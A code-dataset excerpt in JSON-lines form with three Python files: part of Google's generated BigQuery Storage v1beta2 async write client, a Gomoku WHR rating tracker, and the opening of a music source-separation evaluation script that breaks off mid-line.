(),\n ) -> stream.WriteStream:\n r\"\"\"Creates a write stream to the given table. Additionally, every\n table has a special COMMITTED stream named '_default' to which\n data can be written. This stream doesn't need to be created\n using CreateWriteStream. It is a stream that can be used\n simultaneously by any number of clients. Data written to this\n stream is considered committed as soon as an acknowledgement is\n received.\n\n .. code-block:: python\n\n # This snippet has been automatically generated and should be regarded as a\n # code template only.\n # It will require modifications to work:\n # - It may require correct/in-range values for request initialization.\n # - It may require specifying regional endpoints when creating the service\n # client as shown in:\n # https://googleapis.dev/python/google-api-core/latest/client_options.html\n from google.cloud import bigquery_storage_v1beta2\n\n async def sample_create_write_stream():\n # Create a client\n client = bigquery_storage_v1beta2.BigQueryWriteAsyncClient()\n\n # Initialize request argument(s)\n request = bigquery_storage_v1beta2.CreateWriteStreamRequest(\n parent=\"parent_value\",\n )\n\n # Make the request\n response = await client.create_write_stream(request=request)\n\n # Handle the response\n print(response)\n\n Args:\n request (Optional[Union[google.cloud.bigquery_storage_v1beta2.types.CreateWriteStreamRequest, dict]]):\n The request object. Request message for ``CreateWriteStream``.\n parent (:class:`str`):\n Required. Reference to the table to which the stream\n belongs, in the format of\n ``projects/{project}/datasets/{dataset}/tables/{table}``.\n\n This corresponds to the ``parent`` field\n on the ``request`` instance; if ``request`` is provided, this\n should not be set.\n write_stream (:class:`google.cloud.bigquery_storage_v1beta2.types.WriteStream`):\n Required. 
Stream to be created.\n This corresponds to the ``write_stream`` field\n on the ``request`` instance; if ``request`` is provided, this\n should not be set.\n retry (google.api_core.retry.Retry): Designation of what errors, if any,\n should be retried.\n timeout (float): The timeout for this request.\n metadata (Sequence[Tuple[str, str]]): Strings which should be\n sent along with the request as metadata.\n\n Returns:\n google.cloud.bigquery_storage_v1beta2.types.WriteStream:\n Information about a single stream\n that gets data inside the storage\n system.\n\n \"\"\"\n # Create or coerce a protobuf request object.\n # Quick check: If we got a request object, we should *not* have\n # gotten any keyword arguments that map to the request.\n has_flattened_params = any([parent, write_stream])\n if request is not None and has_flattened_params:\n raise ValueError(\n \"If the `request` argument is set, then none of \"\n \"the individual field arguments should be set.\"\n )\n\n request = storage.CreateWriteStreamRequest(request)\n\n # If we have keyword arguments corresponding to fields on the\n # request, apply these.\n if parent is not None:\n request.parent = parent\n if write_stream is not None:\n request.write_stream = write_stream\n\n # Wrap the RPC method; this adds retry and timeout information,\n # and friendly error handling.\n rpc = gapic_v1.method_async.wrap_method(\n self._client._transport.create_write_stream,\n default_retry=retries.Retry(\n initial=0.1,\n maximum=60.0,\n multiplier=1.3,\n predicate=retries.if_exception_type(\n core_exceptions.DeadlineExceeded,\n core_exceptions.ResourceExhausted,\n core_exceptions.ServiceUnavailable,\n ),\n deadline=600.0,\n ),\n default_timeout=600.0,\n client_info=DEFAULT_CLIENT_INFO,\n )\n\n # Certain fields should be provided within the metadata header;\n # add these here.\n metadata = tuple(metadata) + (\n gapic_v1.routing_header.to_grpc_metadata(((\"parent\", request.parent),)),\n )\n\n # Send the request.\n response = await rpc(\n request,\n retry=retry,\n timeout=timeout,\n metadata=metadata,\n )\n\n # Done; return the response.\n return response\n\n def append_rows(\n self,\n requests: Optional[AsyncIterator[storage.AppendRowsRequest]] = None,\n *,\n retry: OptionalRetry = gapic_v1.method.DEFAULT,\n timeout: Union[float, object] = gapic_v1.method.DEFAULT,\n metadata: Sequence[Tuple[str, str]] = (),\n ) -> Awaitable[AsyncIterable[storage.AppendRowsResponse]]:\n r\"\"\"Appends data to the given stream.\n\n If ``offset`` is specified, the ``offset`` is checked against\n the end of stream. The server returns ``OUT_OF_RANGE`` in\n ``AppendRowsResponse`` if an attempt is made to append to an\n offset beyond the current end of the stream or\n ``ALREADY_EXISTS`` if user provids an ``offset`` that has\n already been written to. User can retry with adjusted offset\n within the same RPC stream. If ``offset`` is not specified,\n append happens at the end of the stream.\n\n The response contains the offset at which the append happened.\n Responses are received in the same order in which requests are\n sent. There will be one response for each successful request. If\n the ``offset`` is not set in response, it means append didn't\n happen due to some errors. If one request fails, all the\n subsequent requests will also fail until a success request is\n made again.\n\n If the stream is of ``PENDING`` type, data will only be\n available for read operations after the stream is committed.\n\n .. 
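# [Editor's note] The wrap_method blocks above only install *defaults*; every
# RPC on this client also accepts per-call overrides through its retry= and
# timeout= parameters, e.g. (a sketch, not generated sample code):
#   from google.api_core import retry as retries
#   stream = await client.create_write_stream(
#       request=request,
#       retry=retries.Retry(initial=0.2, maximum=30.0, multiplier=2.0),
#       timeout=120.0,
#   )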
code-block:: python\n\n # This snippet has been automatically generated and should be regarded as a\n # code template only.\n # It will require modifications to work:\n # - It may require correct/in-range values for request initialization.\n # - It may require specifying regional endpoints when creating the service\n # client as shown in:\n # https://googleapis.dev/python/google-api-core/latest/client_options.html\n from google.cloud import bigquery_storage_v1beta2\n\n async def sample_append_rows():\n # Create a client\n client = bigquery_storage_v1beta2.BigQueryWriteAsyncClient()\n\n # Initialize request argument(s)\n request = bigquery_storage_v1beta2.AppendRowsRequest(\n write_stream=\"write_stream_value\",\n )\n\n # This method expects an iterator which contains\n # 'bigquery_storage_v1beta2.AppendRowsRequest' objects\n # Here we create a generator that yields a single `request` for\n # demonstrative purposes.\n requests = [request]\n\n def request_generator():\n for request in requests:\n yield request\n\n # Make the request\n stream = await client.append_rows(requests=request_generator())\n\n # Handle the response\n async for response in stream:\n print(response)\n\n Args:\n requests (AsyncIterator[`google.cloud.bigquery_storage_v1beta2.types.AppendRowsRequest`]):\n The request object AsyncIterator. Request message for ``AppendRows``.\n retry (google.api_core.retry.Retry): Designation of what errors, if any,\n should be retried.\n timeout (float): The timeout for this request.\n metadata (Sequence[Tuple[str, str]]): Strings which should be\n sent along with the request as metadata.\n\n Returns:\n AsyncIterable[google.cloud.bigquery_storage_v1beta2.types.AppendRowsResponse]:\n Response message for AppendRows.\n \"\"\"\n\n # Wrap the RPC method; this adds retry and timeout information,\n # and friendly error handling.\n rpc = gapic_v1.method_async.wrap_method(\n self._client._transport.append_rows,\n default_retry=retries.Retry(\n initial=0.1,\n maximum=60.0,\n multiplier=1.3,\n predicate=retries.if_exception_type(\n core_exceptions.ResourceExhausted,\n core_exceptions.ServiceUnavailable,\n ),\n deadline=86400.0,\n ),\n default_timeout=86400.0,\n client_info=DEFAULT_CLIENT_INFO,\n )\n\n # Certain fields should be provided within the metadata header;\n # add these here.\n metadata = tuple(metadata) + (gapic_v1.routing_header.to_grpc_metadata(()),)\n\n # Send the request.\n response = rpc(\n requests,\n retry=retry,\n timeout=timeout,\n metadata=metadata,\n )\n\n # Done; return the response.\n return response\n\n async def get_write_stream(\n self,\n request: Optional[Union[storage.GetWriteStreamRequest, dict]] = None,\n *,\n name: Optional[str] = None,\n retry: OptionalRetry = gapic_v1.method.DEFAULT,\n timeout: Union[float, object] = gapic_v1.method.DEFAULT,\n metadata: Sequence[Tuple[str, str]] = (),\n ) -> stream.WriteStream:\n r\"\"\"Gets a write stream.\n\n .. 
code-block:: python\n\n # This snippet has been automatically generated and should be regarded as a\n # code template only.\n # It will require modifications to work:\n # - It may require correct/in-range values for request initialization.\n # - It may require specifying regional endpoints when creating the service\n # client as shown in:\n # https://googleapis.dev/python/google-api-core/latest/client_options.html\n from google.cloud import bigquery_storage_v1beta2\n\n async def sample_get_write_stream():\n # Create a client\n client = bigquery_storage_v1beta2.BigQueryWriteAsyncClient()\n\n # Initialize request argument(s)\n request = bigquery_storage_v1beta2.GetWriteStreamRequest(\n name=\"name_value\",\n )\n\n # Make the request\n response = await client.get_write_stream(request=request)\n\n # Handle the response\n print(response)\n\n Args:\n request (Optional[Union[google.cloud.bigquery_storage_v1beta2.types.GetWriteStreamRequest, dict]]):\n The request object. Request message for ``GetWriteStreamRequest``.\n name (:class:`str`):\n Required. Name of the stream to get, in the form of\n ``projects/{project}/datasets/{dataset}/tables/{table}/streams/{stream}``.\n\n This corresponds to the ``name`` field\n on the ``request`` instance; if ``request`` is provided, this\n should not be set.\n retry (google.api_core.retry.Retry): Designation of what errors, if any,\n should be retried.\n timeout (float): The timeout for this request.\n metadata (Sequence[Tuple[str, str]]): Strings which should be\n sent along with the request as metadata.\n\n Returns:\n google.cloud.bigquery_storage_v1beta2.types.WriteStream:\n Information about a single stream\n that gets data inside the storage\n system.\n\n \"\"\"\n # Create or coerce a protobuf request object.\n # Quick check: If we got a request object, we should *not* have\n # gotten any keyword arguments that map to the request.\n has_flattened_params = any([name])\n if request is not None and has_flattened_params:\n raise ValueError(\n \"If the `request` argument is set, then none of \"\n \"the individual field arguments should be set.\"\n )\n\n request = storage.GetWriteStreamRequest(request)\n\n # If we have keyword arguments corresponding to fields on the\n # request, apply these.\n if name is not None:\n request.name = name\n\n # Wrap the RPC method; this adds retry and timeout information,\n # and friendly error handling.\n rpc = gapic_v1.method_async.wrap_method(\n self._client._transport.get_write_stream,\n default_retry=retries.Retry(\n initial=0.1,\n maximum=60.0,\n multiplier=1.3,\n predicate=retries.if_exception_type(\n core_exceptions.DeadlineExceeded,\n core_exceptions.ServiceUnavailable,\n ),\n deadline=600.0,\n ),\n default_timeout=600.0,\n client_info=DEFAULT_CLIENT_INFO,\n )\n\n # Certain fields should be provided within the metadata header;\n # add these here.\n metadata = tuple(metadata) + (\n gapic_v1.routing_header.to_grpc_metadata(((\"name\", request.name),)),\n )\n\n # Send the request.\n response = await rpc(\n request,\n retry=retry,\n timeout=timeout,\n metadata=metadata,\n )\n\n # Done; return the response.\n return response\n\n async def finalize_write_stream(\n self,\n request: Optional[Union[storage.FinalizeWriteStreamRequest, dict]] = None,\n *,\n name: Optional[str] = None,\n retry: OptionalRetry = gapic_v1.method.DEFAULT,\n timeout: Union[float, object] = gapic_v1.method.DEFAULT,\n metadata: Sequence[Tuple[str, str]] = (),\n ) -> storage.FinalizeWriteStreamResponse:\n r\"\"\"Finalize a write stream so that no new data 
can be appended to\n the stream. Finalize is not supported on the '_default' stream.\n\n .. code-block:: python\n\n # This snippet has been automatically generated and should be regarded as a\n # code template only.\n # It will require modifications to work:\n # - It may require correct/in-range values for request initialization.\n # - It may require specifying regional endpoints when creating the service\n # client as shown in:\n # https://googleapis.dev/python/google-api-core/latest/client_options.html\n from google.cloud import bigquery_storage_v1beta2\n\n async def sample_finalize_write_stream():\n # Create a client\n client = bigquery_storage_v1beta2.BigQueryWriteAsyncClient()\n\n # Initialize request argument(s)\n request = bigquery_storage_v1beta2.FinalizeWriteStreamRequest(\n name=\"name_value\",\n )\n\n # Make the request\n response = await client.finalize_write_stream(request=request)\n\n # Handle the response\n print(response)\n\n Args:\n request (Optional[Union[google.cloud.bigquery_storage_v1beta2.types.FinalizeWriteStreamRequest, dict]]):\n The request object. Request message for invoking ``FinalizeWriteStream``.\n name (:class:`str`):\n Required. Name of the stream to finalize, in the form of\n ``projects/{project}/datasets/{dataset}/tables/{table}/streams/{stream}``.\n\n This corresponds to the ``name`` field\n on the ``request`` instance; if ``request`` is provided, this\n should not be set.\n retry (google.api_core.retry.Retry): Designation of what errors, if any,\n should be retried.\n timeout (float): The timeout for this request.\n metadata (Sequence[Tuple[str, str]]): Strings which should be\n sent along with the request as metadata.\n\n Returns:\n google.cloud.bigquery_storage_v1beta2.types.FinalizeWriteStreamResponse:\n Response message for FinalizeWriteStream.\n \"\"\"\n # Create or coerce a protobuf request object.\n # Quick check: If we got a request object, we should *not* have\n # gotten any keyword arguments that map to the request.\n has_flattened_params = any([name])\n if request is not None and has_flattened_params:\n raise ValueError(\n \"If the `request` argument is set, then none of \"\n \"the individual field arguments should be set.\"\n )\n\n request = storage.FinalizeWriteStreamRequest(request)\n\n # If we have keyword arguments corresponding to fields on the\n # request, apply these.\n if name is not None:\n request.name = name\n\n # Wrap the RPC method; this adds retry and timeout information,\n # and friendly error handling.\n rpc = gapic_v1.method_async.wrap_method(\n self._client._transport.finalize_write_stream,\n default_retry=retries.Retry(\n initial=0.1,\n maximum=60.0,\n multiplier=1.3,\n predicate=retries.if_exception_type(\n core_exceptions.DeadlineExceeded,\n core_exceptions.ServiceUnavailable,\n ),\n deadline=600.0,\n ),\n default_timeout=600.0,\n client_info=DEFAULT_CLIENT_INFO,\n )\n\n # Certain fields should be provided within the metadata header;\n # add these here.\n metadata = tuple(metadata) + (\n gapic_v1.routing_header.to_grpc_metadata(((\"name\", request.name),)),\n )\n\n # Send the request.\n response = await rpc(\n request,\n retry=retry,\n timeout=timeout,\n metadata=metadata,\n )\n\n # Done; return the response.\n return response\n\n async def batch_commit_write_streams(\n self,\n request: Optional[Union[storage.BatchCommitWriteStreamsRequest, dict]] = None,\n *,\n parent: Optional[str] = None,\n retry: OptionalRetry = gapic_v1.method.DEFAULT,\n timeout: Union[float, object] = gapic_v1.method.DEFAULT,\n metadata: 
Sequence[Tuple[str, str]] = (),\n ) -> storage.BatchCommitWriteStreamsResponse:\n r\"\"\"Atomically commits a group of ``PENDING`` streams that belong to\n the same ``parent`` table. Streams must be finalized before\n commit and cannot be committed multiple times. Once a stream is\n committed, data in the stream becomes available for read\n operations.\n\n .. code-block:: python\n\n # This snippet has been automatically generated and should be regarded as a\n # code template only.\n # It will require modifications to work:\n # - It may require correct/in-range values for request initialization.\n # - It may require specifying regional endpoints when creating the service\n # client as shown in:\n # https://googleapis.dev/python/google-api-core/latest/client_options.html\n from google.cloud import bigquery_storage_v1beta2\n\n async def sample_batch_commit_write_streams():\n # Create a client\n client = bigquery_storage_v1beta2.BigQueryWriteAsyncClient()\n\n # Initialize request argument(s)\n request = bigquery_storage_v1beta2.BatchCommitWriteStreamsRequest(\n parent=\"parent_value\",\n write_streams=['write_streams_value1', 'write_streams_value2'],\n )\n\n # Make the request\n response = await client.batch_commit_write_streams(request=request)\n\n # Handle the response\n print(response)\n\n Args:\n request (Optional[Union[google.cloud.bigquery_storage_v1beta2.types.BatchCommitWriteStreamsRequest, dict]]):\n The request object. Request message for ``BatchCommitWriteStreams``.\n parent (:class:`str`):\n Required. Parent table that all the streams should\n belong to, in the form of\n ``projects/{project}/datasets/{dataset}/tables/{table}``.\n\n This corresponds to the ``parent`` field\n on the ``request`` instance; if ``request`` is provided, this\n should not be set.\n retry (google.api_core.retry.Retry): Designation of what errors, if any,\n should be retried.\n timeout (float): The timeout for this request.\n metadata (Sequence[Tuple[str, str]]): Strings which should be\n sent along with the request as metadata.\n\n Returns:\n google.cloud.bigquery_storage_v1beta2.types.BatchCommitWriteStreamsResponse:\n Response message for BatchCommitWriteStreams.\n \"\"\"\n # Create or coerce a protobuf request object.\n # Quick check: If we got a request object, we should *not* have\n # gotten any keyword arguments that map to the request.\n has_flattened_params = any([parent])\n if request is not None and has_flattened_params:\n raise ValueError(\n \"If the `request` argument is set, then none of \"\n \"the individual field arguments should be set.\"\n )\n\n request = storage.BatchCommitWriteStreamsRequest(request)\n\n # If we have keyword arguments corresponding to fields on the\n # request, apply these.\n if parent is not None:\n request.parent = parent\n\n # Wrap the RPC method; this adds retry and timeout information,\n # and friendly error handling.\n rpc = gapic_v1.method_async.wrap_method(\n self._client._transport.batch_commit_write_streams,\n default_retry=retries.Retry(\n initial=0.1,\n maximum=60.0,\n multiplier=1.3,\n predicate=retries.if_exception_type(\n core_exceptions.DeadlineExceeded,\n core_exceptions.ServiceUnavailable,\n ),\n deadline=600.0,\n ),\n default_timeout=600.0,\n client_info=DEFAULT_CLIENT_INFO,\n )\n\n # Certain fields should be provided within the metadata header;\n # add these here.\n metadata = tuple(metadata) + (\n gapic_v1.routing_header.to_grpc_metadata(((\"parent\", request.parent),)),\n )\n\n # Send the request.\n response = await rpc(\n request,\n retry=retry,\n 
timeout=timeout,\n metadata=metadata,\n )\n\n # Done; return the response.\n return response\n\n async def flush_rows(\n self,\n request: Optional[Union[storage.FlushRowsRequest, dict]] = None,\n *,\n write_stream: Optional[str] = None,\n retry: OptionalRetry = gapic_v1.method.DEFAULT,\n timeout: Union[float, object] = gapic_v1.method.DEFAULT,\n metadata: Sequence[Tuple[str, str]] = (),\n ) -> storage.FlushRowsResponse:\n r\"\"\"Flushes rows to a BUFFERED stream. If users are appending rows\n to BUFFERED stream, flush operation is required in order for the\n rows to become available for reading. A Flush operation flushes\n up to any previously flushed offset in a BUFFERED stream, to the\n offset specified in the request. Flush is not supported on the\n \\_default stream, since it is not BUFFERED.\n\n .. code-block:: python\n\n # This snippet has been automatically generated and should be regarded as a\n # code template only.\n # It will require modifications to work:\n # - It may require correct/in-range values for request initialization.\n # - It may require specifying regional endpoints when creating the service\n # client as shown in:\n # https://googleapis.dev/python/google-api-core/latest/client_options.html\n from google.cloud import bigquery_storage_v1beta2\n\n async def sample_flush_rows():\n # Create a client\n client = bigquery_storage_v1beta2.BigQueryWriteAsyncClient()\n\n # Initialize request argument(s)\n request = bigquery_storage_v1beta2.FlushRowsRequest(\n write_stream=\"write_stream_value\",\n )\n\n # Make the request\n response = await client.flush_rows(request=request)\n\n # Handle the response\n print(response)\n\n Args:\n request (Optional[Union[google.cloud.bigquery_storage_v1beta2.types.FlushRowsRequest, dict]]):\n The request object. Request message for ``FlushRows``.\n write_stream (:class:`str`):\n Required. 
The stream that is the\n target of the flush operation.\n\n This corresponds to the ``write_stream`` field\n on the ``request`` instance; if ``request`` is provided, this\n should not be set.\n retry (google.api_core.retry.Retry): Designation of what errors, if any,\n should be retried.\n timeout (float): The timeout for this request.\n metadata (Sequence[Tuple[str, str]]): Strings which should be\n sent along with the request as metadata.\n\n Returns:\n google.cloud.bigquery_storage_v1beta2.types.FlushRowsResponse:\n Respond message for FlushRows.\n \"\"\"\n # Create or coerce a protobuf request object.\n # Quick check: If we got a request object, we should *not* have\n # gotten any keyword arguments that map to the request.\n has_flattened_params = any([write_stream])\n if request is not None and has_flattened_params:\n raise ValueError(\n \"If the `request` argument is set, then none of \"\n \"the individual field arguments should be set.\"\n )\n\n request = storage.FlushRowsRequest(request)\n\n # If we have keyword arguments corresponding to fields on the\n # request, apply these.\n if write_stream is not None:\n request.write_stream = write_stream\n\n # Wrap the RPC method; this adds retry and timeout information,\n # and friendly error handling.\n rpc = gapic_v1.method_async.wrap_method(\n self._client._transport.flush_rows,\n default_retry=retries.Retry(\n initial=0.1,\n maximum=60.0,\n multiplier=1.3,\n predicate=retries.if_exception_type(\n core_exceptions.DeadlineExceeded,\n core_exceptions.ServiceUnavailable,\n ),\n deadline=600.0,\n ),\n default_timeout=600.0,\n client_info=DEFAULT_CLIENT_INFO,\n )\n\n # Certain fields should be provided within the metadata header;\n # add these here.\n metadata = tuple(metadata) + (\n gapic_v1.routing_header.to_grpc_metadata(\n ((\"write_stream\", request.write_stream),)\n ),\n )\n\n # Send the request.\n response = await rpc(\n request,\n retry=retry,\n timeout=timeout,\n metadata=metadata,\n )\n\n # Done; return the response.\n return response\n\n async def __aenter__(self) -> \"BigQueryWriteAsyncClient\":\n return self\n\n async def __aexit__(self, exc_type, exc, tb):\n await self.transport.close()\n\n\nDEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo(\n gapic_version=package_version.__version__\n)\n\n\n__all__ = (\"BigQueryWriteAsyncClient\",)\n","sub_path":"google/cloud/bigquery_storage_v1beta2/services/big_query_write/async_client.py","file_name":"async_client.py","file_ext":"py","file_size_in_byte":38876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"418340228","text":"from tabnanny import verbose\nimport whr\n\nclass GomokuTracker():\n def __init__(self, w2, update_model_threshold):\n self.match_result = whr.Base(config={'w2': w2})\n self.current_model = 1\n self.update_model_threshold = update_model_threshold\n\n def init_result_trackers(self, prev_match_results):\n start = 0\n for match in prev_match_results:\n self.current_model = match[0]\n start = match[5]\n for i in range(match[2]):\n self.match_result.create_game('player_'+'{}'.format(match[0]), 'player_'+'{}'.format(match[1]), 'B', match[5])\n for i in range(match[3]):\n self.match_result.create_game('player_'+'{}'.format(match[0]), 'player_'+'{}'.format(match[1]), 'W', match[5])\n for i in range(match[4]):\n self.match_result.create_game('player_'+'{}'.format(match[0]), 'player_'+'{}'.format(match[1]), 'D', match[5])\n if prev_match_results != []:\n fianl_match = prev_match_results[-1]\n if float(fianl_match[2]) / 
(fianl_match[2] + fianl_match[3]) > self.update_model_threshold:\n self.current_model += 1\n \n return start\n\n def init_league_results(self, num_warmup):\n # whr library does not support the 0th day\n day = max(num_warmup, 1)\n self.match_result.create_game(\"main_ckpt_\"+\"{}\".format(num_warmup), \"main_exploit_ckpt_\"+\"{}\".format(num_warmup), \"D\", day)\n self.match_result.create_game(\"league_exploit_ckpt_\"+\"{}\".format(num_warmup), \"main_exploit_ckpt_\"+\"{}\".format(num_warmup), \"D\", day)\n self.match_result.create_game(\"main_ckpt_\"+\"{}\".format(num_warmup), \"league_exploit_ckpt_\"+\"{}\".format(num_warmup), \"D\", day)\n self.match_result.iterate_until_converge(verbose=False)\n\n \n def update_result_tracker(self, iteration, one_won, two_won, draws):\n for i in range(one_won):\n self.match_result.create_game('player_'+'{}'.format(self.current_model), 'player_'+'{}'.format(self.current_model-1), 'B', iteration)\n for i in range(two_won):\n self.match_result.create_game('player_'+'{}'.format(self.current_model), 'player_'+'{}'.format(self.current_model-1), 'W', iteration) \n for i in range(draws):\n self.match_result.create_game('player_'+'{}'.format(self.current_model), 'player_'+'{}'.format(self.current_model-1), 'D', iteration) \n self.match_result.iterate_until_converge(verbose=False)\n\n if one_won + two_won > 0 and float(one_won) / (one_won + two_won) > self.update_model_threshold:\n self.current_model += 1\n \n return self.match_result.get_ordered_ratings()\n\n def find_opponent_hard(self, itr, id, rival_list):\n # print(itr, id, rival_list)\n prob = [self.calc_beat_rate(itr, id, i) for i in rival_list]\n # print(rival_list, prob)\n hard = [(1-i)**2 for i in prob]\n return rival_list[hard.index(max(hard))]\n \n def find_opponent_rel(self, itr, id, rival_list):\n # print(itr, id, rival_list)\n prob = [self.calc_beat_rate(itr, id, i) for i in rival_list]\n # print(rival_list, prob)\n rel = [(1-i)*i for i in prob]\n return rival_list[rel.index(max(rel))]\n\n def calc_beat_rate(self, itr, player1, player2):\n # print(itr, player1, player2)\n virtual_game = whr.Game(player1, player2, \"B\", itr)\n eval = whr.Evaluate(self.match_result)\n return eval.evaluate_single_game(virtual_game)\n\n def create_game(self, player1, player2, result, timestamp):\n self.match_result.create_game(player1, player2, result, timestamp)\n \n def iterate_until_converge(self, verbose=False):\n self.match_result.iterate_until_converge(verbose=False)\n\n def get_ordered_ratings(self):\n self.match_result.iterate_until_converge(verbose=False)\n return self.match_result.get_ordered_ratings()","sub_path":"src/gomoku_rating_utils.py","file_name":"gomoku_rating_utils.py","file_ext":"py","file_size_in_byte":3950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"79058657","text":"# JACSNET Evaluation\n# Author: Vanessa H. 
Tan 04.11.19\n\n# get libraries\nimport sys\nimport numpy as np\nimport pandas as pd\nimport scipy\nimport csv\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\nimport itertools\n\nimport librosa\nimport librosa.display\n\nimport keras\nfrom keras.models import Model\nfrom keras.layers import *\nfrom keras.callbacks import ModelCheckpoint, EarlyStopping, ReduceLROnPlateau\nfrom keras import optimizers\nimport keras.backend as K\n\nimport museval\nimport musdb\nimport norbert\n\nfrom sklearn.metrics import confusion_matrix, multilabel_confusion_matrix, roc_auc_score, accuracy_score, roc_curve, precision_recall_curve, f1_score, auc, average_precision_score\nfrom scipy.optimize import brentq\nfrom scipy.interpolate import interp1d\n\nfrom model import UNETmodule, RECOVmodule\nfrom utils import checkNoise\n\ndef custom_loss_wrapper_a(mask):\n def custom_loss_a(y_true, y_pred):\n mae = K.mean(K.abs(np.multiply(mask, y_pred) - y_true), axis=-1)\n\n y_true = K.clip(y_true, K.epsilon(), 1)\n y_pred = K.clip(np.multiply(mask, y_pred), K.epsilon(), 1)\n KL = K.sum(y_true * K.log(y_true / y_pred), axis=-1)\n\n return mae + (0.5*KL)\n return custom_loss_a\n\ndef binary_focal_loss(gamma=2., alpha=.25):\n \"\"\"\n Binary form of focal loss.\n FL(p_t) = -alpha * (1 - p_t)**gamma * log(p_t)\n where p = sigmoid(x), p_t = p or 1 - p depending on if the label is 1 or 0, respectively.\n References:\n https://arxiv.org/pdf/1708.02002.pdf\n Usage:\n model.compile(loss=[binary_focal_loss(alpha=.25, gamma=2)], metrics=[\"accuracy\"], optimizer=adam)\n \"\"\"\n def binary_focal_loss_fixed(y_true, y_pred):\n \"\"\"\n :param y_true: A tensor of the same shape as `y_pred`\n :param y_pred: A tensor resulting from a sigmoid\n :return: Output tensor.\n \"\"\"\n pt_1 = tf.where(tf.equal(y_true, 1), y_pred, tf.ones_like(y_pred))\n pt_0 = tf.where(tf.equal(y_true, 0), y_pred, tf.zeros_like(y_pred))\n\n epsilon = K.epsilon()\n # clip to prevent NaN's and Inf's\n pt_1 = K.clip(pt_1, epsilon, 1. - epsilon)\n pt_0 = K.clip(pt_0, epsilon, 1. - epsilon)\n\n return -K.sum(alpha * K.pow(1. - pt_1, gamma) * K.log(pt_1)) \\\n -K.sum((1 - alpha) * K.pow(pt_0, gamma) * K.log(1. - pt_0))\n\n return binary_focal_loss_fixed\n\ndef mulphase(inp, phase):\n voc_spec = np.abs(inp)\n voc_spec = np.multiply(voc_spec, phase)\n return voc_spec\n\ndef roc_auc_score_FIXED(y_true, y_pred):\n if len(np.unique(y_true)) == 1: # bug in roc_auc_score\n return accuracy_score(y_true, np.rint(y_pred))\n return roc_auc_score(y_true, y_pred)\n\ndef eval_metrics(y_true, y_pred):\n fpr, tpr, threshold = roc_curve(y_true, y_pred, pos_label=1)\n eer = brentq(lambda x : 1. - x - interp1d(fpr, tpr)(x), 0., 1.)\n auc_res = roc_auc_score_FIXED(y_true, y_pred)\n return auc_res, eer\n\ndef plot_confusion_matrix(cm, classes, title, ax):\n\n ax.imshow(cm, interpolation='nearest', cmap=plt.cm.Blues)\n for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\n ax.text(j, i, cm[i, j],\n horizontalalignment=\"center\",\n color=\"white\" if cm[i, j] > cm.max() / 2. 
else \"black\")\n\n tick_marks = np.arange(len(classes))\n ax.set_xticks(tick_marks), ax.xaxis.set_ticklabels(classes)\n ax.set_yticks(tick_marks), ax.yaxis.set_ticklabels(classes)\n ax.set_xlabel('Predicted')\n ax.set_ylabel('Truth')\n ax.set_title(title)\n ax.grid(False)\n\ndef plot_multiclass_confusion_matrix(y_true, y_pred, label_to_class, save_plot=False):\n fig, axes = plt.subplots(int(np.ceil(len(label_to_class) / 2)), 2, figsize=(5, 5))\n axes = axes.flatten()\n for i, conf_matrix in enumerate(multilabel_confusion_matrix(y_true, y_pred)):\n tn, fp, fn, tp = conf_matrix.ravel()\n f1 = 2 * tp / (2 * tp + fp + fn + sys.float_info.epsilon)\n recall = tp / (tp + fn + sys.float_info.epsilon)\n precision = tp / (tp + fp + sys.float_info.epsilon)\n plot_confusion_matrix(\n np.array([[tp, fn], [fp, tn]]),\n classes=['+', '-'],\n title=f'Label: {label_to_class[i]}\\nf1={f1:.5f}\\nrecall={recall:.5f}\\nprecision={precision:.5f}',\n ax=axes[i]\n )\n plt.tight_layout()\n plt.show()\n if save_plot:\n plt.savefig('confusion_matrices.png', dpi=50)\n\ndef main(args):\n\n # Parameters\n seed = 3\n num_classes = 4\n num_epochs = 100\n drop_prob = 0\n learning_rate = 1e-4\n window_size = 2048\n hop_size = 512\n window = np.blackman(window_size)\n\n # Model Architecture\n inputs = Input(shape=[1025, 94, 1])\n\n recov_input = UNETmodule(inputs, 1, drop_prob)\n recov_input = LeakyReLU(alpha=0.2, name='recov_input')(recov_input)\n\n UNET = UNETmodule(recov_input, num_classes, drop_prob)\n sep_sources = Activation('softmax', name='sep_sources')(UNET)\n\n sourceclass = GlobalAveragePooling2D()(UNET)\n sourceclass = Dense(128, activation='relu')(sourceclass)\n sourceclass = Dense(128, activation='relu')(sourceclass)\n sourceclass = Dense(128, activation='relu')(sourceclass)\n sourceclass = Dense(num_classes)(sourceclass)\n sourceclass = Activation('sigmoid', name='sourceclass')(sourceclass)\n\n # Train Model Architecture\n loss_funcs = {\n \"sep_sources\": custom_loss_wrapper_a(mask = inputs),\n \"sourceclass\": binary_focal_loss(),\n \"recov_input\": \"binary_crossentropy\"\n }\n lossWeights = {\"sep_sources\": 10, \"sourceclass\": 0.01, \"recov_input\": 0.5}\n optimizer = optimizers.Adam(lr=learning_rate)\n reduce_lr = ReduceLROnPlateau(monitor='val_loss', patience=5)\n model = Model(inputs=inputs, outputs=[sep_sources, sourceclass, recov_input])\n model.compile(loss=loss_funcs, optimizer=optimizer, loss_weights=lossWeights)\n\n # Load Model\n model.load_weights(\"model_weights.hdf5\")\n\n # initiate musdb\n mus = musdb.DB(root_dir=\"D:/Data/Musdb18\")\n\n # load the testing tracks\n tracks = mus.load_mus_tracks(subsets=['test'])\n\n SDR_results = []\n SIR_results = []\n ISR_results = []\n SAR_results = []\n\n classresults = []\n classresults_hat = []\n labelresults = []\n\n duration = 3\n for track in tracks:\n print(track.name)\n\n audio, sr = librosa.load(str('D:/Data/Musdb18/mixturev2/test/' + track.name + '.wav'))\n # audio = librosa.util.normalize(audio, norm=np.inf, axis=None)\n dur = librosa.get_duration(y=audio, sr=sr)\n\n for i in range(0, int(dur - duration), duration):\n labelclass = [0, 0, 0, 0]\n\n # STFT Mixture\n mixture, sr = librosa.load(str('D:/Data/Musdb18/mixturev2/test/' + track.name + '.wav'), offset=i, duration=duration, mono=True, sr=16000)\n orig = librosa.core.stft(mixture, hop_length=hop_size, n_fft=window_size, window=window)\n magnitude, phase = librosa.magphase(orig)\n orig_norm = 2 * magnitude / np.sum(window)\n\n X = np.reshape(orig_norm, (1, 1025, 94, 1))\n X = 
